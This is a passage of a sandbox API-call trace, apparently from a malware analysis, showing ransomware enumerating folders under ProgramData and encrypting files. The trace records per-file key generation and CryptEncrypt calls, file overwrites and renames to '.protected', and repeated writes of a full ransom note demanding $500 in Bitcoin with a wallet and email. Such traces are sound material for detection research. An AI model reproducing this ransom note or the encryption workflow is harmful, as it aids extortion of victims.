SERVER-ID:\r\n") returned 1341 [0066.836] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0066.837] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.837] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0066.839] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.839] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0066.840] CloseHandle (hObject=0xb4) returned 1 [0066.840] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.840] lstrcmpiW (lpString1="Downloader", lpString2="Windows") returned -1 [0066.840] lstrcmpiW (lpString1="Downloader", lpString2="Program Files") returned -1 [0066.840] lstrcmpiW (lpString1="Downloader", lpString2="Program Files (x86)") returned -1 [0066.840] lstrcmpiW (lpString1="Downloader", lpString2="$Recycle.bin") returned 1 [0066.840] lstrcmpiW (lpString1="Downloader", lpString2="System Volume Information") returned -1 [0066.840] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader") returned 47 [0066.840] lstrcmpW (lpString1="Downloader", lpString2=".") returned 1 [0066.840] lstrcmpW (lpString1="Downloader", lpString2="..") returned 1 [0066.840] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*") returned 49 [0066.840] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0066.840] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.840] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.840] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.840] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.840] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.841] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\.") returned 49 [0066.841] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.841] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0066.841] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.841] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.841] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.841] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.841] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.841] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\..") returned 50 [0066.841] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.841] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.841] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0066.841] lstrcmpiW (lpString1="qmgr0.dat", lpString2="Windows") returned -1 [0066.841] lstrcmpiW (lpString1="qmgr0.dat", lpString2="Program Files") returned 1 [0066.841] lstrcmpiW (lpString1="qmgr0.dat", lpString2="Program Files (x86)") returned 1 [0066.841] lstrcmpiW (lpString1="qmgr0.dat", lpString2="$Recycle.bin") returned 1 [0066.841] lstrcmpiW (lpString1="qmgr0.dat", lpString2="System Volume Information") returned -1 [0066.841] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned 57 [0066.841] StrStrIW (lpFirst="qmgr0.dat", lpSrch=".protected") returned 0x0 [0066.841] lstrcmpW (lpString1="qmgr0.dat", lpString2="RESTORE_FILES.txt") returned -1 [0066.841] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0066.841] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0066.841] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0066.841] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned 57 [0066.841] StrStrW (lpFirst="qmgr0.dat", lpSrch=".txt") returned 0x0 [0066.841] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned 57 [0066.841] StrStrW (lpFirst="qmgr0.dat", lpSrch=".rar") returned 0x0 [0066.841] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned 57 [0066.841] StrStrW (lpFirst="qmgr0.dat", lpSrch=".zip") returned 0x0 [0066.842] ReadFile (in: hFile=0xd4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0066.846] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.846] WriteFile (in: hFile=0xd4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0066.847] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.847] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0066.848] WriteFile (in: hFile=0xd4, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0066.848] CloseHandle (hObject=0xd4) returned 1 [0066.882] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat.protected") returned 67 [0066.882] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat.protected" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat.protected")) returned 1 [0066.883] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0066.883] lstrcmpiW (lpString1="qmgr1.dat", lpString2="Windows") returned -1 [0066.883] lstrcmpiW (lpString1="qmgr1.dat", lpString2="Program Files") returned 1 [0066.883] lstrcmpiW (lpString1="qmgr1.dat", lpString2="Program Files (x86)") returned 1 [0066.883] lstrcmpiW (lpString1="qmgr1.dat", lpString2="$Recycle.bin") returned 1 [0066.883] lstrcmpiW (lpString1="qmgr1.dat", lpString2="System Volume Information") returned -1 [0066.883] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned 57 [0066.883] StrStrIW (lpFirst="qmgr1.dat", lpSrch=".protected") returned 0x0 [0066.883] lstrcmpW (lpString1="qmgr1.dat", lpString2="RESTORE_FILES.txt") returned -1 [0066.883] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0066.883] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0066.883] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0066.884] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned 57 [0066.884] StrStrW (lpFirst="qmgr1.dat", lpSrch=".txt") returned 0x0 [0066.884] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned 57 [0066.884] StrStrW (lpFirst="qmgr1.dat", lpSrch=".rar") returned 0x0 [0066.884] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned 57 [0066.884] StrStrW (lpFirst="qmgr1.dat", lpSrch=".zip") returned 0x0 [0066.884] ReadFile (in: hFile=0xd4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0066.888] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.888] WriteFile (in: hFile=0xd4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0066.889] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.889] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0066.891] WriteFile (in: hFile=0xd4, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0066.891] CloseHandle (hObject=0xd4) returned 1 [0066.892] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat.protected") returned 67 [0066.892] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat.protected" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat.protected")) returned 1 [0066.892] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0066.892] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0066.893] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\RESTORE_FILES.txt") returned 65 [0066.893] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.893] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.893] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0066.894] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.894] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0066.894] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.894] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0066.894] CloseHandle (hObject=0xb4) returned 1 [0066.894] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0066.894] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0066.894] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\RESTORE_FILES.txt") returned 54 [0066.894] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\network\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0066.894] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.894] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0066.895] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.895] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0066.895] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.895] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0066.896] CloseHandle (hObject=0xa4) returned 1 [0066.896] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0066.896] lstrcmpiW (lpString1="OFFICE", lpString2="Windows") returned -1 [0066.896] lstrcmpiW (lpString1="OFFICE", lpString2="Program Files") returned -1 [0066.896] lstrcmpiW (lpString1="OFFICE", lpString2="Program Files (x86)") returned -1 [0066.896] lstrcmpiW (lpString1="OFFICE", lpString2="$Recycle.bin") returned 1 [0066.896] lstrcmpiW (lpString1="OFFICE", lpString2="System Volume Information") returned -1 [0066.896] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE") returned 35 [0066.896] lstrcmpW (lpString1="OFFICE", lpString2=".") returned 1 [0066.896] lstrcmpW (lpString1="OFFICE", lpString2="..") returned 1 [0066.896] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*") returned 37 [0066.896] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0066.904] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.904] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.904] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.904] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.904] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.904] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\.") returned 37 [0066.904] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.904] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.904] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.904] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.904] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.904] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.904] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.904] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\..") returned 38 [0066.904] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.904] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.905] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.905] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="Windows") returned -1 [0066.905] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="Program Files") returned -1 [0066.905] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="Program Files (x86)") returned -1 [0066.905] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="$Recycle.bin") returned 1 [0066.905] lstrcmpiW (lpString1="AssetLibrary.ico", lpString2="System Volume Information") returned -1 [0066.905] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico") returned 52 [0066.905] StrStrIW (lpFirst="AssetLibrary.ico", lpSrch=".protected") returned 0x0 [0066.905] lstrcmpW (lpString1="AssetLibrary.ico", lpString2="RESTORE_FILES.txt") returned -1 [0066.905] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0066.905] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0066.905] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.926] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico") returned 52 [0066.926] StrStrW (lpFirst="AssetLibrary.ico", lpSrch=".txt") returned 0x0 [0066.926] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico") returned 52 [0066.926] StrStrW (lpFirst="AssetLibrary.ico", lpSrch=".rar") returned 0x0 [0066.926] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico") returned 52 [0066.926] StrStrW (lpFirst="AssetLibrary.ico", lpSrch=".zip") returned 0x0 [0066.926] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x1536, lpOverlapped=0x0) returned 1 [0066.949] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffeaca, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.949] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x1536, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x1536, lpOverlapped=0x0) returned 1 [0066.950] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, 